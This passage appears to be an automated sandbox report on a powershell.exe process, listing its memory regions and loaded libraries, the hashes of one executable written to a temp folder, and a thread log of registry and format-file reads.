pagefile_0x0000000000070000	0x00070000	0x00071fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x00080000	0x00082fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x0014ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00150000	0x001b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001d0000	0x001d0000	0x001d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001e0000	0x001e0000	0x001effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000200000	0x00200000	0x00200fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000210000	0x00210000	0x00211fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000240000	0x00240000	0x0027ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000280000	0x00280000	0x0037ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000380000	0x00380000	0x00380fff	Pagefile Backed Memory	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x00390000	0x003adfff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000003b0000	0x003b0000	0x003b0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000003c0000	0x003c0000	0x003c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000003d0000	0x003d0000	0x0040ffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000410000	0x00410000	0x00410fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000420000	0x00420000	0x0042ffff	Private Memory		Region Actions
private_0x0000000000430000	0x00430000	0x0043ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x005c7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000005d0000	0x005d0000	0x00750fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000760000	0x00760000	0x01b5ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001b60000	0x01b60000	0x01c3efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01c4ffff	Private Memory		Region Actions
private_0x0000000001c50000	0x01c50000	0x01c5ffff	Private Memory		Region Actions
private_0x0000000001c60000	0x01c60000	0x01c6ffff	Private Memory		Region Actions
private_0x0000000001c70000	0x01c70000	0x01c7ffff	Private Memory		Region Actions
private_0x0000000001c80000	0x01c80000	0x01c8ffff	Private Memory		Region Actions
private_0x0000000001c90000	0x01c90000	0x01c9ffff	Private Memory	Readable, Writable	Region Actions
l_intl.nls	0x01ca0000	0x01ca2fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001cb0000	0x01cb0000	0x01cb0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001cc0000	0x01cc0000	0x01cfffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x01d00000	0x01fcefff	Memory Mapped File	Readable	Region Actions
private_0x0000000001fd0000	0x01fd0000	0x020cffff	Private Memory	Readable, Writable	Region Actions
sorttbls.nlp	0x020d0000	0x020d4fff	Memory Mapped File	Readable	Region Actions
microsoft.wsman.runtime.dll	0x020e0000	0x020e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000020f0000	0x020f0000	0x020f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002100000	0x02100000	0x0213ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002140000	0x02140000	0x02140fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002170000	0x02170000	0x021affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000021b0000	0x021b0000	0x025a2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000025d0000	0x025d0000	0x0260ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002630000	0x02630000	0x0266ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002690000	0x02690000	0x026cffff	Private Memory	Readable, Writable	Region Actions
sortkey.nlp	0x026d0000	0x02710fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002720000	0x02720000	0x0275ffff	Private Memory	Readable, Writable	Region Actions
system.transactions.dll	0x02760000	0x027a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000027c0000	0x027c0000	0x027fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002810000	0x02810000	0x0284ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002850000	0x02850000	0x028effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002920000	0x02920000	0x0295ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000002a00000	0x02a00000	0x02a3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a40000	0x02a40000	0x02a4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a50000	0x02a50000	0x04a4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004ac0000	0x04ac0000	0x04afffff	Private Memory	Readable, Writable	Region Actions
system.management.automation.dll	0x04b00000	0x04de1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll.mui	0x04df0000	0x04eaffff	Memory Mapped File	Readable, Writable	Region Actions
powershell.exe	0x22160000	0x221d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x60340000	0x60347fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x642c0000	0x642ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x642f0000	0x643b2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x64560000	0x645fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x64600000	0x64684fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x64690000	0x646b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x646c0000	0x6470afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x64710000	0x64944fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x64950000	0x651c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.dll	0x651d0000	0x654b1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x654c0000	0x65540fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x65550000	0x65cebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x65cf0000	0x667e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x66870000	0x6690afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x66950000	0x66efafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x66ed0000	0x66efdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x67370000	0x6737afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x67380000	0x67398fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x673a0000	0x6740ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.dll	0x67aa0000	0x67ae2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x68220000	0x6826bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x68d70000	0x68d90fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x68da0000	0x68e94fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x68f60000	0x68f9afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x691b0000	0x69229fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x73600000	0x73615fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x73620000	0x73669fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x73ab0000	0x73abafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x73ac0000	0x73ad6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x73c20000	0x73dbdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x73f80000	0x73f87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73f90000	0x73febfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73ff0000	0x7402efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x74590000	0x74599fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x74cd0000	0x74ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x74d80000	0x74d88fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x750d0000	0x750d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x75310000	0x7538ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x75420000	0x754a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75630000	0x7568ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x756a0000	0x756b1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x756c0000	0x757cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x757d0000	0x757e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75800000	0x75845fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x75850000	0x75894fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x758a0000	0x758a4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x758b0000	0x75a4cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75a50000	0x75adffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c60000	0x75d5ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x75d60000	0x75d86fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x75df0000	0x75e7efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75e80000	0x75f6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x761a0000	0x761f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x76200000	0x7635bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76360000	0x76fa9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76fb0000	0x7707bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x77140000	0x771ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x77310000	0x773acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x773b0000	0x7744ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000077450000	0x77450000	0x7756efff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000077570000	0x77570000	0x77669fff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x77820000	0x77829fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions
For performance reasons, the remaining 106 entries are omitted. The remaining entries can be found in flog.txt.

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe	271.50 KB (278016 bytes)	MD5: 4a9bf49040bccb972dc64a0976039de2 SHA1: 6d67e6b649505a5fc58145c89d066e8e716fddca SHA256: 2b7f82d1063d449f64f0ca84e5bf90a895c42154d715aabae0ca06043f238234		File Actions Show Properties Download

Threads

Thread 0xa98

(Host: 0, Network: 0)

Category	Operation	Information	Count	Logfile
File	Get Info		1	Fn
Process	Open	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Module	Enumerate	process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Module	Get Filename	process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Process	Open	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
File	Get Info		1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
File	Get Info		1	Fn
File	Get Info		1	Fn
File	Get Info		1	Fn
File	Create	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	2	Fn
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn Data
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
File	Create	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml	2	Fn
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn Data
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	2	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	2	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	2	Fn
File	Create	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	2	Fn
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn Data
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	9	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	3	Fn
File	Create	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	2	Fn
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn Data
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	3	Fn
File	Create	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml	2	Fn
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn Data
File	Read	filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn Data
File	Get Info		1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
